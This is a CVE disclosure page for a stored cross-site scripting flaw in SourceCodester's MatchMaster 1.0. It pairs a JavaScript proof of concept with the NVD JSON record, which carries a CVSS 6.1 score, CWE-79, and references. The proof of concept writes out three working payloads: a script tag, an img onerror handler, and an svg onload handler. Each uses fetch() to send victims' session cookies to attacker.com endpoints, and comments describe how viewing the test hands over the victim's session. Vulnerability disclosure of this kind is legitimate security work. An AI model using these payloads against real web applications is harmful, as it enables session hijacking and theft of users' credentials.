CVE-2025-63713

// CVE-2025-63713 PoC - XSS in MatchMaster 1.0 // This PoC demonstrates the XSS vulnerability in the test creation feature // Payload 1: Stored XSS via Test Title const xssPayloadTitle = '<script>\n fetch("https://attacker.com/steal?cookie=" + document.cookie)\n<\/script>'; // Payload 2: XSS via Matching Pair Item (using img onerror) const xssPayloadItem = '<img src=x onerror="fetch(\'https://attacker.com/log?data=\'+document.cookie)">'; // Payload 3: XSS using event handler const xssPayloadEvent = '<svg/onload=fetch("https://attacker.com/exfil?"+btoa(document.cookie))>'; // Simulate creating a malicious test function createMaliciousTest() { const testData = { title: xssPayloadTitle, pairs: [ { left: xssPayloadItem, right: 'Correct Answer' }, { left: 'Question 2', right: xssPayloadEvent } ] }; // In real attack, this would be submitted to the application console.log('Malicious test created with XSS payload'); console.log('Payload will execute when victim views the test'); return testData; } // When victim views the test, the following happens: // 1. Application retrieves test data from database // 2. Test title is inserted into HTML without encoding: <h1>{user_input}</h1> // 3. Browser executes the script tag // 4. Attacker gains access to victim's session createMaliciousTest();

{"cve": {"id": "CVE-2025-63713", "sourceIdentifier": "[email protected]", "published": "2025-11-07T18:15:36.373", "lastModified": "2025-11-18T19:33:04.807", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Scripting (XSS) vulnerability in SourceCodester \"MatchMaster\" 1.0 allows remote attackers to inject arbitrary web script or HTML via crafted input in the custom test creation feature. The vulnerability exists because the application fails to properly sanitize user-supplied input in test titles and matching pair items before rendering them in the DOM during test execution."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:remyandrade:matching_type_test:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "C4946409-420D-4572-8038-6DA2B6FC20AC"}]}]}], "references": [{"url": "https://github.com/floccocam-cpu/CVE-Research-2025/blob/main/CVE-2025-63713/README7.md", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, {"url": "https://www.sourcecodester.com/javascript/18431/matching-type-test-using-html-css-and-javascript-source-code.html", "source": "[email protected]", "tags": ["Product"]}]}}